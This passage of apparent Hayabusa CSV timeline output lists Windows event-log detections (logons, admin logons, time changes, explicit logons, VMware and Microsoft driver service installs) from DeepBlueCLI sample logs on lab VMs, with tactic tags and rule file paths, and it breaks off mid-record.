0x2b7c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7c0 | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x2b7f0 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target 
User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | 
Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:36:37.000 
+09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ 
| Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service 
Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source 
User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | 
LID: 0x36aed | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service 
Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: 
IEUser | LID: 0x11c32,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vSockets Driver | Path: 
C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink 
Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start 
